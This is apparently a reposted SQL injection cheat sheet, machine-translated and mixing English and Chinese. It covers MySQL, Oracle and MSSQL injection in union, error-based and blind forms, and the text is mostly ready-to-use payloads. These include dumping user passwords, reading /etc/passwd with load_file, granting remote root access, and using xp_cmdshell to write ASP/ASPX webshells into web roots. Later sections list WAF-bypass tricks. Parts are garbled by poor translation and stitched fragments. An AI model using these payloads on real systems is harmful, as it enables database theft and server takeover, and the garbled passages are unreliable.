SQL injection attack methods can be divided into explicit injection, error injection and blind injection according to the application processing the content returned by the database.
The attacker can directly obtain the desired content in the current interface content.
The database query return result is not displayed on the page, but the application prints the database error information to the page, so the attacker can construct a database error Statement to get the desired content from the error message.
The database query results cannot be obtained from the intuitive page. The attacker obtains what he wants by using database logic or delaying the execution of the database library. content.
Mysql manual injection
?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+ group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name ?id=0' union select 1,2,3,group_concat(password) from users --+ group_concat 可替换为 concat_ws(',',id,users,password ) ?id=0' union select 1,2,3,password from users limit 0,1--+
Error reporting injection
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select \* from test where id=1 and geometrycollection((select \* from(select \* from(select user())a)b));
5 .multipoint()
select \* from test where id=1 and multipoint((select \* from(select \* from(select user())a)b));
6.polygon()
select \* from test where id=1 and polygon((select \* from(select \* from(select user())a)b));
7.multipolygon()
select \* from test where id=1 and multipolygon((select \* from(select \* from(select user())a)b));
8.linestring()
select \* from test where id=1 and linestring((select \* from(select \* from(select user())a)b));
9.multilinestring ()
select \* from test where id=1 and multilinestring((select \* from(select \* from(select user())a)b));
10.exp()
select \* from test where id=1 and exp(\~(select \* from(select user())a)); 爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema\_name),0x7e) from information\_schema.schemata limit 2,1),1) -- + 爆表:?id=1' and updatexml(1,(select concat(0x7e,(table\_name),0x7e) from information\_schema.tables where table\_schema='security' limit 3,1),1) -- + 爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column\_name),0x7e) from information\_schema.columns where table\_name=0x7573657273 limit 2,1),1) -- + 爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- + concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) 盲注
Time blind injection
Commonly used function sleep()
Split function substr , substring, left
You don’t need quotation marks after encoding the split function, ascii() hex()
Generally, for blind injection, we also need to use the conditional judgment function
if (expre1 , expre2, expre3)
When expre1 is true, return expre2, when false, return expre3
?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+ ?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+
Boolean blind injection
?id=1' and substr((select user()),1,1)='r' -- + ?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- + //如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值 ?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- + //若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个,则返回 -1 ,其它情况返回 1 insert,delete,update
This kind Injection will appear in registrations, IP headers, message boards, etc. where data needs to be written. For example, using sqlmap will generate a large amount of garbage data
Trying to insert, quotation marks, double quotation marks, escape characters\ makes the statement unable Execute normally, then if the insert fails, the update fails, and then in-depth testing determines whether there is injection
Second injection and wide byte injection
Secondary injection:
In sql statements without single quotes, perform hexadecimal encoding so that there will be no single quotes
Wide byte injection:
Single quote escape is ', mysql will encode \ as \. Two bytes in the wide byte represent a Chinese character, so adding � to \ turns it into a Chinese character "luck", thereby bypassing the escape
Oracle manual injection
lian injection
?id=-1' union select user,null from dual-- ?id=-1' union select version,null from v$instance-- ?id=-1' union select table\_name,null from (select \* from (select rownum as limit,table\_name from user\_tables) where limit=3)-- ?id=-1' union select column\_name,null from (select \* from (select rownum as limit,column\_name from user\_tab\_columns where table\_name ='USERS') where limit=2)-- ?id=-1' union select username,passwd from users-- ?id=-1' union select username,passwd from (select \* from (select username,passwd,rownum as limit from users) where limit=3)--
Error injection
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select table\_name from (select rownum as limit,table\_name from user\_tables) where limit= 3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select column\_name from (select rownum as limit,column\_name from user\_tab\_columns where table\_name ='USERS') where limit=3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--
Boolean blind injection
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)-- ?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)-- ?id=1' and ascii(substr(user,1,1))> 64--
Time blind injection
?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS\_PIPE.RECEIVE\_MESSAGE('a',5) else 1 end)-- ?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS\_PIPE.RECEIVE\_MESSAGE('a',5) else 1 end)--
SQL manual injection
Determine whether the injection point exists
Number type After injecting the
url, enter
and 1=1
and 1=2
If the returns are different, you can determine that the injection point exists
Example:
http://www.xxx.cn/news.php?p=1&id=4' Return error
http://www.xxx.cn /news.php?p=1&id=4 and 1=1 returns correct
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 returns error
Inject the character type into
and enter
' and 1=1 and '1'='1
' and 1=2 and '1'='1
http://www.xxx.cn/news.php?p=1&id=4' returns error
http://www.xxx.cn /news.php?p=1&id=4' and 1=1 and '1'='1 returns correct
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 and '1'='1 returns an error
Search injection
Enter
' in the input box and returns an error
x%' and 1=1 and '%'=' returns correct
x%' and 1=2 and '%'=' returns error
Judge the number of fields
digit
http://www.xxx.cn/news.php?p=1&id=4 order by 26 returns correct
http://www.xxx.cn/news .php?p=1&id=4 order by 27 Return error
Conclusion: The number of fields is 26.
Character type
http://www.xxx.cn/news.php?p=1&id=4' order by 26 # Return correct
http:// www.xxx.cn/news.php?p=1&id=4' order by 27 # Return error
Conclusion: field number 26.
Search type
x%' order by 26 # Return correct
x%' order by 27 # Return error
Conclusion: Number of fields 26.
Find displayable fields
Number type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2, 3,4,5,6,7,8,9,....
Character type
http://www.xxx.cn/news.php?p=1&id= 4' and 1=2 union select 1,2,3,4,5,6,7,8,9,....
#Search type
x%' and 1 =2 union select 1,2,3,4,5,6,7,8,9,....
#Check database name
Number type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,database(),4,5,6,7,8,9,.. ..
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,database(), 4,5,6,7,8,9,....
#Search type
x%' and 1=2 union select 1,2,database(),4, 5,6,7,8,9,....
#Check the table name in the database
Number type
http://www.xxx .cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17 from information_schema.tables where table_schema='database name'
The database name can also use hexadecimal
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='database name'
#The database name can also use hexadecimal
Search type
X%' and 1=2 union select 1,2,group_concat(table_name),4,5 ,6,7,8,9,.... from information_schema.tables where table_schema='database name'
#The database name can also be in hexadecimal
Look up the table Column name
numeric
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(column_name) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='table name'
The table name is also You can use hexadecimal
character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat( column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='table name'
# The table name can also use hexadecimal
search type
x%' and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8 ,9,.... from information_schema.columns where table_name='table name'
#The table name can also be in hexadecimal
Look up the data in the table
Number type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(username,password),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17 from table name
Character type
http://www.xxx. cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17 from table name
#search type
x%' and 1=2 union select 1,2,group_concat(username,password),4,5,6, 7,8,9,.... from table name
#Display version: select version();
Display character set: select @@character_set_database;
Display Database show databases;
Display table name: show tables;
Display computer name: select @@hostname;
Display system version: select @@version_compile_os;
Display mysql path: select @@basedir;
Display database path: select @@datadir;
Display root password: select User,Password from mysql.user;
Open external connections: GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
MySQL function utilization
MySQL provides the load_file() function, which can help Users can quickly read files, but the file location must be on the server, the file path must be an absolute path, and root permissions are required
The SQL statement is as follows: union select 1,load_file('/etc/passwd'),3 ,4,5
#Usually, some anti-injection statements do not allow single quotes to appear, so you can use the following statement to bypass:
union select 1,load_file(0x272F6574632F70617373776427),3,4 ,5
# Convert the path to hexadecimal.
MSSQL Manual Injection
Different from SQL injection, SQL uses explosion displayed fields, MSSQL uses error reporting injection, inserts malicious sql statements, and causes queries to report errors. In the reported error, display the information we want.
Injection point:
www.xxx.cn/xxx/xxx.aspx?id=1
Query database version
@@ version: MSSQL global variable, indicating database version information.
Test statement:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and @@version>0
Note: "and @@vsersion>0" can also be written as "and 0/@@version>0"
Error message:
When changing the nvarchar value to 'Microsoft SQL Server 2008 R2 (SP3) - 10.50. 6000.34 (X64) Aug 19 2014 12:21:34 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 Reason: @@version is a global variable of MSSQL. If we add "and @@version>0" after "?id=1", then "and" will The statement will force "@@version" to be converted into int type and compared with 0, but the type conversion fails, so the database information is exposed. @@servername: MSSQL global variable, representing the computer name. Error message: Failed to convert nvarchar value ‘WINDOWS-XXXXXX‘ to data type int. db_name(): The currently used database name. Error message: Failed to convert nvarchar value ‘abc’ to data type int. User_Name(): The user currently connected to the database. Error message: Failed to convert nvarchar value ‘dbo‘ to data type int. Note: If you see dbo, then most users of the current database have dba authority. Explode other databases: http://www.xxx.cn/xxx/xxx.aspx?id=1 and ( SELECT top 1 Name FROM Master..SysDatabases)>0 Error message: Failed while converting nvarchar value 'master' to data type int. The other databases write this: http://www.xxx.cn/xxx/xxx.aspx?id=1 and (SELECT top 1 Name FROM Master.. SysDatabases where name not in ('master'))>0 To continue, write like this: http://www.xxx.cn/xxx/xxx.aspx?id= 1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','abc'))>0 Look up table name: http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 name from abc.sys.all_objects where type= 'U' AND is_ms_shipped=0)>0 Error message: Failed to convert nvarchar value 'depart' to data type int. Explore other tables: http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 name from abc.sys.all_objects where type ='U' AND is_ms_shipped=0 and name not in ('depart'))>0 Continue: http://www.xxx.cn/xxx/xxx. aspx?id=1 and (select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('depart','worker'))>0 Check the field name: http://www.xxx.cn/xxx/xxx.aspx?id=1 and ( select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='depart')>0 Error message: Failed to convert nvarchar value 'ID' to data type int. Explore other fields: http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 COLUMN_NAME from abc .information_schema.columns where TABLE_NAME='depart' and COLUMN_NAME not in ('ID'))>0 Continue: http://www.xxx.cn/xxx/ xxx.aspx?id=1 and (select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='depart' and COLUMN_NAME not in ('ID','NAME'))>0 Query data: http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 password from depart)>0 Error message: Failed to convert nvarchar value 'B5A1EF8730200F93E50F4F5DEBBCAC0B' into data type int. If the data permission is dba and the absolute path of the website is known, then we can use this statement to write a one-sentence Trojan: asp Trojan: http://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %> ;;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'-- aspx Trojan: http ://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=Jscript %>;<%eval(Request("sb"), "unsafe")%>''" >C:\inetpub\wwwroot\2.aspx' -- The principle is that sql server supports stacked queries, and xp_cmdshell can be used to execute cmd instructions, which are used in cmd instructions [echo content>File] can write files to the disk. http://www.xxx.com/xxx/xxx.aspx?username=xxx Use "HEX Encoding" under Encoding of the hackbar tool in Firefox browser Easily encode the string into exploitable hex, and then use error injection to inject it into the website. select convert(int,@@version) After hex encoding: 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 Then use the following method to inject: http://www.xxx.com/xxx/xxx.aspx?username=xxx';dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)– Error message: The nvarchar value is 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft CorporationStandard Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor)' Conversion to data type int failed. Pay attention to the following injection statement: dEcLaRe @s vArChAr(8000) //Declare a local variable @s, type varchar(8000) sEt @s= 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 //Assign a value to @s, the hexadecimal encoding of "select convert(int,@@version)" eXeC(@s) //Call the function exec() to execute "@s" Content. select convert(int,db_name()) select convert(int, User_Name()) select convert(int,(select top 1 name from abc[database name].sys.all_objects where type='U' AND is_ms_shipped= 0)) select convert(int,(select top 1 name from abc[database name].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass'))) select convert(int,(select top 1 COLUMN_NAME from abc[database name].information_schema.columns where TABLE_NAME='CMS_Userinfo[table name]')) select convert(int,(select top 1 COLUMN_NAME from abc[database name] ].information_schema.columns where TABLE_NAME='CMS_Userinfo[table name]' and COLUMN_NAME not in ('id'))) select convert(int,(select top 1 username from CMS_Admin)) select convert(int,(select top 1 password from CMS_Admin)) 1.id-1 , if the page returns the correct page, it means there is injection, is 1 okay? (www.test.com/xsn.php?id=12 1) does not work, because the plus sign means a space in the url. 2. Do you know how many annotations there are in mysql? Three types: ①.# This comment lasts until the end of the line; ②./Comment multiple lines/; ③.– This comment lasts until the end of the line. The third method needs explanation, because I was not familiar with this way of writing before. Although I still have some impression of ‘-’ as a comment character, ‘-’ gives me a headache. In fact, it is -, please note that there is a space after -. If you enter spaces directly in the URL, the browser will automatically ignore it and fail to pass it to the database. So I specifically replaced it with a plus sign. 3. Can "select select * from admin" be executed? If not, please explain. Cannot be executed. When using select double layer, you must enclose the second one, otherwise it will be invalid. If spaces are filtered out, do you know how to bypass them? Or do you know which characters can replace spaces? These characters are called whitespace characters. Such as un
ion will be treated as a union. If the spaces are filtered, the possible sql statement will become: select from messages where uid=45or1=1, we can use // to replace the spaces: http://www.xxx.com/index.php?id= 45//or/**/1=1 Additionally:
/|–|/ /@–|/ /?–|/ /| – |/ can replace spaces. 5.What are the permissions of the Oracle database under Windows? The Oracle database under Windows must be run with system permissions. 6.What is the difference between SQL injection and blind SQL injection? In regular SQL injection, the application returns the data in the database and presents it to you, but in the blind SQL injection vulnerability, you can only get two different values corresponding to the true and false conditions in the injection. In response, the application returns different values for true and false conditions, but the attacker cannot retrieve the query results. 7. What are the main causes of SQL injection vulnerabilities? Web applications that do not adequately review user-supplied data and do not encode the output are the main causes of problems. 8. What is stacked query? In a single database connection, multiple query sequences are executed. Whether stacked queries are allowed is one of the important factors that affects whether SQL injection vulnerabilities can be exploited. In MYSQL, SELECT * FROM members; DROP members; can be executed. The database definitely supports stacked queries, but it may not be possible to let PHP execute the SQL statements of stacked queries. /*! ...*/ What does it mean? Specific to the MYSQL database, if you add an exclamation mark at the beginning of a comment followed by the database version number, the comment will be parsed into code as long as the database version is higher than or equal to the version contained in the comment. The code will be executed. select 1 /!40119 1/ The query results: Return 2 (MySQL version is 4.01.19 or higher) Return 1 (Other situations) 10. What if the '=' in the injection statement is filtered? You can consider using the like keyword to replace: union select password from users where username like admin; 11. What if spaces are filtered? You can consider using '/**/'Replace: union//select//password//from//users//where//username//like//admin; Note that if keywords are filtered, in MySQL, you can also use inline comments inside the keywords to bypass: uni/ /on//sel//ect//password//fr//om//users//wh//ere//username//like//admin; 12. ' ' in SQL injection ? MSSQL: In MSSQL, the " " operator is used for string concatenation and addition operations, '1' '1'='11', 1 1=2; MySQL: In MySQL, the " " operator is only used for addition operations, '1' '1'='2', 1 1=2; Oracle: In Oracle, the " " operator is only used For addition operation, '1' '1'='2', 1 1=2. 13. What are the connectors for strings in the database? MSSQL: 'a' 'b'='ab' MYSQL: 'a' 'b'='ab' Oracle: 'a'||' b'='ab' 14. Comment symbol MSSQL: '-- ' (note the space after), '/.../' MySQL: '-- ','# ','/.../', note that there must be one or more spaces after --. Oracle: '-- ','/.../' In the three databases, the common comment character is '-- ' union/**/select union/aaaa bbs/select union/aaaaaaaaaaaaaaaaaaaaaaaaaaa/select Inline comments: /!xxxx / MySQL空白符:%90,%0A,%0B,%0D,%20,%0C,%A0,/xxx/ 正则的空白符:%09,%0A,%0B,%0D,%20 Example-1:union%250Cselect Example-1:union%25A0select concat%2520( concat/**/( concat%250c( concat%25a0( select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0 select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0 select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0 Error-based SQL注入函数非常容易被忽略 MySQL特殊语法 select{x table_name}from{x information_schema.tables}; 以注释绕过为例子,开始Fuzz 注释符绕过: *先测试最基本的: union/**/select *再测试中间引入特殊字:union/aaaa%01bbs/select *最后测试注释长度:union/aaaaaaaaaaaaaaaaaaaaaaa/select 最基本的模式: union/something/select 大小写绕过 即使在程序中设置了过滤关键字,但由于过滤过程中没有深入分析组成关键字的部分,所以只能对整体进行过滤。 例如:and过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。可以通过修改关键字的内字母大小写来绕过过滤措施。 如果在程序中设置遇到关键字时将其替换为一个空字符串,那么将不会发生SQL注入攻击。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了一次替换。 例如:过滤了union 只要发现union 无论大小写都会被替换为空。这是就可以通过双写uniunionon的写法来对过滤进行绕过。 可以利用网络中的URl在线编码,绕过SQL注入的过滤机制。 http://tool.chinaz.com/Tools/urlencode.aspx 1 在Mysql中内容注释中的内容可以被当做SQL语句执行。 Mysql一些特性: 1、Mysql中的大小写不敏感,大写和小写一样。 2、Mysql中的十六进制与URL编码。 3、符号和关键字替换 and --> &&、or --> || 4、内联注释与多行注释 /!内联注释/ /多行注释/。 5、Mysql中会自动识别URL与Hex编码好的内容。 绕过策略: 1、大小写变形,or,OR,oR,Or,and,And,AND,aND等。 2、在这两个敏感词汇中添加注释,例如:a/**/and 双写:oorr 3、利用符号替代 and–>&&、or–>|| 编码:hex,urlencode 空格URL编码: %0a 新建一行 %0c 新的一页 %0d return功能 %0b TAB键(垂直) Sqlmap安全检测: sqlmap -u “URL” --hex --dbs --batch 编码%0a、加入/**/符,union/select大小写、双写等绕过。 The above is the detailed content of What are the types of SQL injection?. For more information, please follow other related articles on the PHP Chinese website!
Query computer name
Query the current database name
Query the user currently connected to the database
Query other database names
Query the table name in the database
query table The column name or field name
Explosive data
Writing a one-sentence Trojan
Use hex encoding to bypass WAF
Explosive database version
Explode the current database
Explode the current user
精品
Explosive field
Explosive data
SQL injection Q&A tips
WAF bypass
Rule level bypass
SQL comment character bypass
White space bypass:
函数分隔符号:
浮点数词法分析:
利用error_based进行SQL注入:extractvalue(1,concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
GeometryCollection((select * from (select * from
(select@@version)f)x))
polygon((select*from (select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
每一个点都能找到绕过的方法
常规绕过手段
双写绕过
编码绕过
内联注释绕过
绕过过滤and和or的SQL注入
绕过去除空格的SQL注入
绕过去除(union和select)的SQL注入